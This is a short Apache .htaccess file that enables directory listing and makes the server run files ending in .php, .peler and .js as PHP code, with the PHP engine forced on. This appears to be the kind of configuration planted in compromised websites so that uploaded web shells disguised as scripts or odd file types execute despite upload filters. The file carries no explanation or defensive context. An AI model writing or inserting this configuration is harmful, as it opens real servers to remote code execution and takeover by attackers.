Options All
AddType application/x-httpd-php .php
AddType application/x-httpd-php .peler
AddType application/x-httpd-php .js
<FilesMatch "index.php">
    Order Deny,Allow
    Allow from All
    php_flag engine on
</FilesMatch>
php_flag engine on